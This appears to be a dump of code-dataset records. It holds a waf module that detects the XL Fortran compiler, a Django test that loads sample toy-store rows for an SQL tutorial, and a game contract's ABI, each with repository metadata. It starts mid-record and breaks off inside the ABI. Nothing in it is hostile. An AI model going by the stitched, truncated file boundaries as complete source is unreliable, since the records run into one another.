+\n (\'\\x1b[31;01m-\\x1b[39;00m\' * 10 + \'\\x1b[31;01m+\\x1b[39;00m\' + \n \'\\x1b[31;01m-\\x1b[39;00m\' * 4) +\n """\x1b[31;01m+\x1b[39;00m\n \x1b[31;01m|\x1b[39;00m 观音 \x1b[31;01m|\x1b[39;00m"""\n +\n """ 2 \x1b[31;01m|\x1b[39;00m\n \x1b[31;01m|\x1b[39;00m Ποσειδῶν \x1b[31;01m|\x1b[39;00m"""\n + \' b \\x1b[31;01m|\\x1b[39;00m\\n \' + \'\\x1b[31;01m+\\x1b[39;00m\' +\n (\'\\x1b[31;01m-\\x1b[39;00m\' * 10 + \'\\x1b[31;01m+\\x1b[39;00m\' + \n \'\\x1b[31;01m-\\x1b[39;00m\' * 4) + \'\\x1b[31;01m+\\x1b[39;00m\')'}, {}), '(\' \\x1b[31;01m+\\x1b[39;00m\' + (\'\\x1b[31;01m-\\x1b[39;00m\' * 10 +\n \'\\x1b[31;01m+\\x1b[39;00m\' + \'\\x1b[31;01m-\\x1b[39;00m\' * 4) +\n """\x1b[31;01m+\x1b[39;00m\n \x1b[31;01m|\x1b[39;00m h1 \x1b[31;01m|\x1b[39;00m"""\n + \' h2 \\x1b[31;01m|\\x1b[39;00m\\n \' + \'\\x1b[31;01m+\\x1b[39;00m\' +\n (\'\\x1b[31;01m-\\x1b[39;00m\' * 10 + \'\\x1b[31;01m+\\x1b[39;00m\' + \n \'\\x1b[31;01m-\\x1b[39;00m\' * 4) +\n """\x1b[31;01m+\x1b[39;00m\n \x1b[31;01m|\x1b[39;00m 观音 \x1b[31;01m|\x1b[39;00m"""\n +\n """ 2 \x1b[31;01m|\x1b[39;00m\n \x1b[31;01m|\x1b[39;00m Ποσειδῶν \x1b[31;01m|\x1b[39;00m"""\n + \' b \\x1b[31;01m|\\x1b[39;00m\\n \' + \'\\x1b[31;01m+\\x1b[39;00m\' +\n (\'\\x1b[31;01m-\\x1b[39;00m\' * 10 + \'\\x1b[31;01m+\\x1b[39;00m\' + \n \'\\x1b[31;01m-\\x1b[39;00m\' * 4) + \'\\x1b[31;01m+\\x1b[39;00m\')', False, 'from textwrap import dedent\n')] |
jeikabu/lumberyard | dev/Tools/build/waf-1.7.13/waflib/extras/fc_xlf.py | 07228c605ce16cbf5aaa209a94a3cb9d6c1a4115 | #! /usr/bin/env python
# encoding: utf-8
# harald at klimachs.de
import re
from waflib import Utils,Errors
from waflib.Tools import fc,fc_config,fc_scan
from waflib.Configure import conf
from waflib.Tools.compiler_fc import fc_compiler
fc_compiler['aix'].insert(0, 'fc_xlf')
@conf
def find_xlf(conf):
"""Find the xlf program (will look in the environment variable 'FC')"""
fc = conf.find_program(['xlf2003_r', 'xlf2003', 'xlf95_r', 'xlf95', 'xlf90_r', 'xlf90', 'xlf_r', 'xlf'], var='FC')
fc = conf.cmd_to_list(fc)
conf.get_xlf_version(fc)
conf.env.FC_NAME='XLF'
@conf
def xlf_flags(conf):
v = conf.env
v['FCDEFINES_ST'] = '-WF,-D%s'
v['FCFLAGS_fcshlib'] = ['-qpic=small']
v['FCFLAGS_DEBUG'] = ['-qhalt=w']
v['LINKFLAGS_fcshlib'] = ['-Wl,-shared']
@conf
def xlf_modifier_platform(conf):
dest_os = conf.env['DEST_OS'] or Utils.unversioned_sys_platform()
xlf_modifier_func = getattr(conf, 'xlf_modifier_' + dest_os, None)
if xlf_modifier_func:
xlf_modifier_func()
@conf
def get_xlf_version(conf, fc):
"""Get the compiler version"""
cmd = fc + ['-qversion']
try:
out, err = conf.cmd_and_log(cmd, output=0)
except Errors.WafError:
conf.fatal('Could not find xlf %r' % cmd)
for v in (r"IBM XL Fortran.* V(?P<major>\d*)\.(?P<minor>\d*)",):
version_re = re.compile(v, re.I).search
match = version_re(out or err)
if match:
k = match.groupdict()
conf.env['FC_VERSION'] = (k['major'], k['minor'])
break
else:
conf.fatal('Could not determine the XLF version.')
def configure(conf):
conf.find_xlf()
conf.find_ar()
conf.fc_flags()
conf.fc_add_flags()
conf.xlf_flags()
conf.xlf_modifier_platform()
| [((17, 6, 17, 115), 'waflib.Configure.conf.find_program', 'conf.find_program', (), '', False, 'from waflib.Configure import conf\n'), ((18, 6, 18, 26), 'waflib.Configure.conf.cmd_to_list', 'conf.cmd_to_list', ({(18, 23, 18, 25): 'fc'}, {}), '(fc)', False, 'from waflib.Configure import conf\n'), ((19, 1, 19, 25), 'waflib.Configure.conf.get_xlf_version', 'conf.get_xlf_version', ({(19, 22, 19, 24): 'fc'}, {}), '(fc)', False, 'from waflib.Configure import conf\n'), ((58, 1, 58, 16), 'waflib.Configure.conf.find_xlf', 'conf.find_xlf', ({}, {}), '()', False, 'from waflib.Configure import conf\n'), ((59, 1, 59, 15), 'waflib.Configure.conf.find_ar', 'conf.find_ar', ({}, {}), '()', False, 'from waflib.Configure import conf\n'), ((60, 1, 60, 16), 'waflib.Configure.conf.fc_flags', 'conf.fc_flags', ({}, {}), '()', False, 'from waflib.Configure import conf\n'), ((61, 1, 61, 20), 'waflib.Configure.conf.fc_add_flags', 'conf.fc_add_flags', ({}, {}), '()', False, 'from waflib.Configure import conf\n'), ((62, 1, 62, 17), 'waflib.Configure.conf.xlf_flags', 'conf.xlf_flags', ({}, {}), '()', False, 'from waflib.Configure import conf\n'), ((63, 1, 63, 29), 'waflib.Configure.conf.xlf_modifier_platform', 'conf.xlf_modifier_platform', ({}, {}), '()', False, 'from waflib.Configure import conf\n'), ((32, 34, 32, 66), 'waflib.Utils.unversioned_sys_platform', 'Utils.unversioned_sys_platform', ({}, {}), '()', False, 'from waflib import Utils, Errors\n'), ((43, 13, 43, 44), 'waflib.Configure.conf.cmd_and_log', 'conf.cmd_and_log', (), '', False, 'from waflib.Configure import conf\n'), ((55, 2, 55, 52), 'waflib.Configure.conf.fatal', 'conf.fatal', ({(55, 13, 55, 51): '"""Could not determine the XLF version."""'}, {}), "('Could not determine the XLF version.')", False, 'from waflib.Configure import conf\n'), ((45, 2, 45, 43), 'waflib.Configure.conf.fatal', 'conf.fatal', ({(45, 13, 45, 42): "('Could not find xlf %r' % cmd)"}, {}), "('Could not find xlf %r' % cmd)", False, 'from waflib.Configure import conf\n'), ((48, 15, 48, 34), 're.compile', 're.compile', ({(48, 26, 48, 27): 'v', (48, 29, 48, 33): 're.I'}, {}), '(v, re.I)', False, 'import re\n')] |
MeGustas-5427/SQL_Tutorials | tutorials/create_table/tests.py | 627372c2d5d8656d72645830c9a1fae1df278fc7 | #!/usr/bin/python3
# -*- coding:utf-8 -*-
# __author__ = '__MeGustas__'
from django.test import TestCase
from django.db import connection
from tutorials.create_table.models import *
# Create your tests here.
class TestHealthFile(TestCase):
def setUp(self):
cursor = connection.cursor()
# Populate Customers table
cursor.execute("INSERT INTO Customers(cust_id, cust_name, cust_address, cust_city, cust_state, cust_zip, cust_country, cust_contact, cust_email) \
VALUES('1000000001', 'Village Toys', '200 Maple Lane', 'Detroit', 'MI', '44444', 'USA', 'John Smith', '[email protected]');")
cursor.execute("INSERT INTO Customers(cust_id, cust_name, cust_address, cust_city, cust_state, cust_zip, cust_country, cust_contact) \
VALUES('1000000002', 'Kids Place', '333 South Lake Drive', 'Columbus', 'OH', '43333', 'USA', 'Michelle Green');")
cursor.execute("INSERT INTO Customers(cust_id, cust_name, cust_address, cust_city, cust_state, cust_zip, cust_country, cust_contact, cust_email) \
VALUES('1000000003', 'Fun4All', '1 Sunny Place', 'Muncie', 'IN', '42222', 'USA', 'Jim Jones', '[email protected]');")
cursor.execute("INSERT INTO Customers(cust_id, cust_name, cust_address, cust_city, cust_state, cust_zip, cust_country, cust_contact, cust_email) \
VALUES('1000000004', 'Fun4All', '829 Riverside Drive', 'Phoenix', 'AZ', '88888', 'USA', 'Denise L. Stephens', '[email protected]');")
cursor.execute("INSERT INTO Customers(cust_id, cust_name, cust_address, cust_city, cust_state, cust_zip, cust_country, cust_contact) \
VALUES('1000000005', 'The Toy Store', '4545 53rd Street', 'Chicago', 'IL', '54545', 'USA', 'Kim Howard');")
# Populate Vendors table
cursor.execute("INSERT INTO Vendors(vend_id, vend_name, vend_address, vend_city, vend_state, vend_zip, vend_country) \
VALUES('BRS01','Bears R Us','123 Main Street','Bear Town','MI','44444', 'USA');")
cursor.execute("INSERT INTO Vendors(vend_id, vend_name, vend_address, vend_city, vend_state, vend_zip, vend_country) \
VALUES('BRE02','Bear Emporium','500 Park Street','Anytown','OH','44333', 'USA');")
cursor.execute("INSERT INTO Vendors(vend_id, vend_name, vend_address, vend_city, vend_state, vend_zip, vend_country) \
VALUES('DLL01','Doll House Inc.','555 High Street','Dollsville','CA','99999', 'USA');")
cursor.execute("INSERT INTO Vendors(vend_id, vend_name, vend_address, vend_city, vend_state, vend_zip, vend_country) \
VALUES('FRB01','Furball Inc.','1000 5th Avenue','New York','NY','11111', 'USA');")
cursor.execute("INSERT INTO Vendors(vend_id, vend_name, vend_address, vend_city, vend_state, vend_zip, vend_country) \
VALUES('FNG01','Fun and Games','42 Galaxy Road','London', NULL,'N16 6PS', 'England');")
cursor.execute("INSERT INTO Vendors(vend_id, vend_name, vend_address, vend_city, vend_state, vend_zip, vend_country) \
VALUES('JTS01','Jouets et ours','1 Rue Amusement','Paris', NULL,'45678', 'France');")
# Populate Products table
cursor.execute("INSERT INTO Products(prod_id, vend_id, prod_name, prod_price, prod_desc) \
VALUES('BR01', 'BRS01', '8 inch teddy bear', 5.99, '8 inch teddy bear, comes with cap and jacket');")
cursor.execute("INSERT INTO Products(prod_id, vend_id, prod_name, prod_price, prod_desc) \
VALUES('BR02', 'BRS01', '12 inch teddy bear', 8.99, '12 inch teddy bear, comes with cap and jacket');")
cursor.execute("INSERT INTO Products(prod_id, vend_id, prod_name, prod_price, prod_desc) \
VALUES('BR03', 'BRS01', '18 inch teddy bear', 11.99, '18 inch teddy bear, comes with cap and jacket');")
cursor.execute("INSERT INTO Products(prod_id, vend_id, prod_name, prod_price, prod_desc) \
VALUES('BNBG01', 'DLL01', 'Fish bean bag toy', 3.49, 'Fish bean bag toy, complete with bean bag worms with which to feed it');")
cursor.execute("INSERT INTO Products(prod_id, vend_id, prod_name, prod_price, prod_desc) \
VALUES('BNBG02', 'DLL01', 'Bird bean bag toy', 3.49, 'Bird bean bag toy, eggs are not included');")
cursor.execute("INSERT INTO Products(prod_id, vend_id, prod_name, prod_price, prod_desc) \
VALUES('BNBG03', 'DLL01', 'Rabbit bean bag toy', 3.49, 'Rabbit bean bag toy, comes with bean bag carrots');")
cursor.execute("INSERT INTO Products(prod_id, vend_id, prod_name, prod_price, prod_desc) \
VALUES('RGAN01', 'DLL01', 'Raggedy Ann', 4.99, '18 inch Raggedy Ann doll');")
cursor.execute("INSERT INTO Products(prod_id, vend_id, prod_name, prod_price, prod_desc) \
VALUES('RYL01', 'FNG01', 'King doll', 9.49, '12 inch king doll with royal garments and crown');")
cursor.execute("INSERT INTO Products(prod_id, vend_id, prod_name, prod_price, prod_desc) \
VALUES('RYL02', 'FNG01', 'Queen doll', 9.49, '12 inch queen doll with royal garments and crown');")
# Populate Orders table
cursor.execute("INSERT INTO Orders(order_num, order_date, cust_id) \
VALUES(20005, '2020-05-01', '1000000001');")
cursor.execute("INSERT INTO Orders(order_num, order_date, cust_id) \
VALUES(20006, '2020-01-12', '1000000003');")
cursor.execute("INSERT INTO Orders(order_num, order_date, cust_id) \
VALUES(20007, '2020-01-30', '1000000004');")
cursor.execute("INSERT INTO Orders(order_num, order_date, cust_id) \
VALUES(20008, '2020-02-03', '1000000005');")
cursor.execute("INSERT INTO Orders(order_num, order_date, cust_id) \
VALUES(20009, '2020-02-08', '1000000001');")
# Populate OrderItems table
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20005, 1, 'BR01', 100, 5.49);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20005, 2, 'BR03', 100, 10.99);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20006, 1, 'BR01', 20, 5.99);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20006, 2, 'BR02', 10, 8.99);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20006, 3, 'BR03', 10, 11.99);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20007, 1, 'BR03', 50, 11.49);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20007, 2, 'BNBG01', 100, 2.99);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20007, 3, 'BNBG02', 100, 2.99);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20007, 4, 'BNBG03', 100, 2.99);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20007, 5, 'RGAN01', 50, 4.49);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20008, 1, 'RGAN01', 5, 4.99);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20008, 2, 'BR03', 5, 11.99);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20008, 3, 'BNBG01', 10, 3.49);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20008, 4, 'BNBG02', 10, 3.49);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20008, 5, 'BNBG03', 10, 3.49);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20009, 1, 'BNBG01', 250, 2.49);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20009, 2, 'BNBG02', 250, 2.49);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20009, 3, 'BNBG03', 250, 2.49);")
def tearDown(self):
# Clean up run after every test method.
Customers.objects.all().delete()
Vendors.objects.all().delete()
Orders.objects.all().delete()
OrderItems.objects.all().delete()
Products.objects.all().delete()
def test_customers(self):
for i in Customers.objects.all():
print(i.to_dict())
for i in Vendors.objects.all():
print(i.to_dict())
for i in Orders.objects.all():
print(i.to_dict())
for i in OrderItems.objects.all():
print(i.to_dict())
for i in Products.objects.all():
print(i.to_dict()) | [((16, 17, 16, 36), 'django.db.connection.cursor', 'connection.cursor', ({}, {}), '()', False, 'from django.db import connection\n')] |
tmfds/dfk | hero/hero.py | 91b6f95a4630b57deecf87cf4850b6576646c7d1 | import copy
from web3 import Web3
from .utils import utils as hero_utils
CONTRACT_ADDRESS = '0x5f753dcdf9b1ad9aabc1346614d1f4746fd6ce5c'
ABI = """
[
{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"approved","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Approval","type":"event"},
{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},
{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":false,"internalType":"uint256","name":"heroId","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"summonerId","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"assistantId","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"statGenes","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"visualGenes","type":"uint256"}],"name":"HeroSummoned","type":"event"},
{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"account","type":"address"}],"name":"Paused","type":"event"},
{"anonymous":false,"inputs":[{"indexed":true,"internalType":"bytes32","name":"role","type":"bytes32"},{"indexed":true,"internalType":"bytes32","name":"previousAdminRole","type":"bytes32"},{"indexed":true,"internalType":"bytes32","name":"newAdminRole","type":"bytes32"}],"name":"RoleAdminChanged","type":"event"},
{"anonymous":false,"inputs":[{"indexed":true,"internalType":"bytes32","name":"role","type":"bytes32"},{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":true,"internalType":"address","name":"sender","type":"address"}],"name":"RoleGranted","type":"event"},
{"anonymous":false,"inputs":[{"indexed":true,"internalType":"bytes32","name":"role","type":"bytes32"},{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":true,"internalType":"address","name":"sender","type":"address"}],"name":"RoleRevoked","type":"event"},
{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Transfer","type":"event"},
{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"account","type":"address"}],"name":"Unpaused","type":"event"},
{"inputs":[],"name":"DEFAULT_ADMIN_ROLE","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},
{"inputs":[],"name":"HERO_MODERATOR_ROLE","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},
{"inputs":[],"name":"MINTER_ROLE","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},
{"inputs":[],"name":"MODERATOR_ROLE","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},
{"inputs":[],"name":"PAUSER_ROLE","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},
{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"approve","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},
{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[{"internalType":"uint256","name":"_statGenes","type":"uint256"},{"internalType":"uint256","name":"_visualGenes","type":"uint256"},
{"internalType":"enum IHeroTypes.Rarity","name":"_rarity","type":"uint8"},
{"internalType":"bool","name":"_shiny","type":"bool"},{"components":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"uint256","name":"summonerId","type":"uint256"},{"internalType":"uint256","name":"assistantId","type":"uint256"},{"internalType":"uint16","name":"generation","type":"uint16"},{"internalType":"uint256","name":"createdBlock","type":"uint256"},{"internalType":"uint256","name":"heroId","type":"uint256"},{"internalType":"uint8","name":"summonerTears","type":"uint8"},{"internalType":"uint8","name":"assistantTears","type":"uint8"},{"internalType":"address","name":"bonusItem","type":"address"},{"internalType":"uint32","name":"maxSummons","type":"uint32"},{"internalType":"uint32","name":"firstName","type":"uint32"},{"internalType":"uint32","name":"lastName","type":"uint32"},{"internalType":"uint8","name":"shinyStyle","type":"uint8"}],"internalType":"struct ICrystalTypes.HeroCrystal","name":"_crystal","type":"tuple"}],"name":"createHero","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"nonpayable","type":"function"},
{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},
{"inputs":[{"internalType":"uint256","name":"_id","type":"uint256"}],"name":"getHero","outputs":[{"components":[{"internalType":"uint256","name":"id","type":"uint256"},{"components":[{"internalType":"uint256","name":"summonedTime","type":"uint256"},{"internalType":"uint256","name":"nextSummonTime","type":"uint256"},{"internalType":"uint256","name":"summonerId","type":"uint256"},{"internalType":"uint256","name":"assistantId","type":"uint256"},{"internalType":"uint32","name":"summons","type":"uint32"},{"internalType":"uint32","name":"maxSummons","type":"uint32"}],"internalType":"struct IHeroTypes.SummoningInfo","name":"summoningInfo","type":"tuple"},{"components":[{"internalType":"uint256","name":"statGenes","type":"uint256"},{"internalType":"uint256","name":"visualGenes","type":"uint256"},{"internalType":"enum IHeroTypes.Rarity","name":"rarity","type":"uint8"},{"internalType":"bool","name":"shiny","type":"bool"},{"internalType":"uint16","name":"generation","type":"uint16"},{"internalType":"uint32","name":"firstName","type":"uint32"},{"internalType":"uint32","name":"lastName","type":"uint32"},{"internalType":"uint8","name":"shinyStyle","type":"uint8"},{"internalType":"uint8","name":"class","type":"uint8"},{"internalType":"uint8","name":"subClass","type":"uint8"}],"internalType":"struct IHeroTypes.HeroInfo","name":"info","type":"tuple"},{"components":[{"internalType":"uint256","name":"staminaFullAt","type":"uint256"},{"internalType":"uint256","name":"hpFullAt","type":"uint256"},{"internalType":"uint256","name":"mpFullAt","type":"uint256"},{"internalType":"uint16","name":"level","type":"uint16"},{"internalType":"uint64","name":"xp","type":"uint64"},{"internalType":"address","name":"currentQuest","type":"address"},{"internalType":"uint8","name":"sp","type":"uint8"},{"internalType":"enum IHeroTypes.HeroStatus","name":"status","type":"uint8"}],"internalType":"struct IHeroTypes.HeroState","name":"state","type":"tuple"},{"components":[{"internalType":"uint16","name":"strength","type":"uint16"},{"internalType":"uint16","name":"intelligence","type":"uint16"},{"internalType":"uint16","name":"wisdom","type":"uint16"},{"internalType":"uint16","name":"luck","type":"uint16"},{"internalType":"uint16","name":"agility","type":"uint16"},{"internalType":"uint16","name":"vitality","type":"uint16"},{"internalType":"uint16","name":"endurance","type":"uint16"},{"internalType":"uint16","name":"dexterity","type":"uint16"},{"internalType":"uint16","name":"hp","type":"uint16"},{"internalType":"uint16","name":"mp","type":"uint16"},{"internalType":"uint16","name":"stamina","type":"uint16"}],"internalType":"struct IHeroTypes.HeroStats","name":"stats","type":"tuple"},{"components":[{"internalType":"uint16","name":"strength","type":"uint16"},{"internalType":"uint16","name":"intelligence","type":"uint16"},{"internalType":"uint16","name":"wisdom","type":"uint16"},{"internalType":"uint16","name":"luck","type":"uint16"},{"internalType":"uint16","name":"agility","type":"uint16"},{"internalType":"uint16","name":"vitality","type":"uint16"},{"internalType":"uint16","name":"endurance","type":"uint16"},{"internalType":"uint16","name":"dexterity","type":"uint16"},{"internalType":"uint16","name":"hpSm","type":"uint16"},{"internalType":"uint16","name":"hpRg","type":"uint16"},{"internalType":"uint16","name":"hpLg","type":"uint16"},{"internalType":"uint16","name":"mpSm","type":"uint16"},{"internalType":"uint16","name":"mpRg","type":"uint16"},{"internalType":"uint16","name":"mpLg","type":"uint16"}],"internalType":"struct IHeroTypes.HeroStatGrowth","name":"primaryStatGrowth","type":"tuple"},{"components":[{"internalType":"uint16","name":"strength","type":"uint16"},{"internalType":"uint16","name":"intelligence","type":"uint16"},{"internalType":"uint16","name":"wisdom","type":"uint16"},{"internalType":"uint16","name":"luck","type":"uint16"},{"internalType":"uint16","name":"agility","type":"uint16"},{"internalType":"uint16","name":"vitality","type":"uint16"},{"internalType":"uint16","name":"endurance","type":"uint16"},{"internalType":"uint16","name":"dexterity","type":"uint16"},{"internalType":"uint16","name":"hpSm","type":"uint16"},{"internalType":"uint16","name":"hpRg","type":"uint16"},{"internalType":"uint16","name":"hpLg","type":"uint16"},{"internalType":"uint16","name":"mpSm","type":"uint16"},{"internalType":"uint16","name":"mpRg","type":"uint16"},{"internalType":"uint16","name":"mpLg","type":"uint16"}],"internalType":"struct IHeroTypes.HeroStatGrowth","name":"secondaryStatGrowth","type":"tuple"},{"components":[{"internalType":"uint16","name":"mining","type":"uint16"},{"internalType":"uint16","name":"gardening","type":"uint16"},{"internalType":"uint16","name":"foraging","type":"uint16"},{"internalType":"uint16","name":"fishing","type":"uint16"}],"internalType":"struct IHeroTypes.HeroProfessions","name":"professions","type":"tuple"}],"internalType":"struct IHeroTypes.Hero","name":"","type":"tuple"}],"stateMutability":"view","type":"function"},
{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"}],"name":"getRoleAdmin","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},
{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"uint256","name":"index","type":"uint256"}],"name":"getRoleMember","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},
{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"}],"name":"getRoleMemberCount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},
{"inputs":[{"internalType":"address","name":"_address","type":"address"}],"name":"getUserHeroes","outputs":[{"internalType":"uint256[]","name":"","type":"uint256[]"}],"stateMutability":"view","type":"function"},
{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"account","type":"address"}],"name":"grantRole","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"account","type":"address"}],"name":"hasRole","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},
{"inputs":[{"internalType":"string","name":"_name","type":"string"},{"internalType":"string","name":"_symbol","type":"string"},{"internalType":"string","name":"_url","type":"string"},{"internalType":"address","name":"_statScienceAddress","type":"address"}],"name":"initialize","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[{"internalType":"string","name":"name","type":"string"},{"internalType":"string","name":"symbol","type":"string"},{"internalType":"string","name":"baseTokenURI","type":"string"}],"name":"initialize","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"operator","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},
{"inputs":[{"internalType":"address","name":"to","type":"address"}],"name":"mint","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},
{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},
{"inputs":[],"name":"pause","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[],"name":"paused","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},
{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"account","type":"address"}],"name":"renounceRole","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"account","type":"address"}],"name":"revokeRole","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"bytes","name":"_data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[{"internalType":"address","name":"_statScienceAddress","type":"address"}],"name":"setStatScienceAddress","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},
{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"index","type":"uint256"}],"name":"tokenByIndex","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"uint256","name":"index","type":"uint256"}],"name":"tokenOfOwnerByIndex","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},
{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},
{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[],"name":"unpause","outputs":[],"stateMutability":"nonpayable","type":"function"},
